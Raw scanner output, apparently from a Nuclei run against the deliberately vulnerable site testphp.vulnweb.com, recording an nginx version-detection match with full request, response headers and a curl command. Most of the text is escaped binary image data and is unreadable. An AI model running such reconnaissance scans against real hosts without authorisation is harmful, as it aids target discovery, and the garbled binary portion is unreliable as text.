17\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.645630129Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\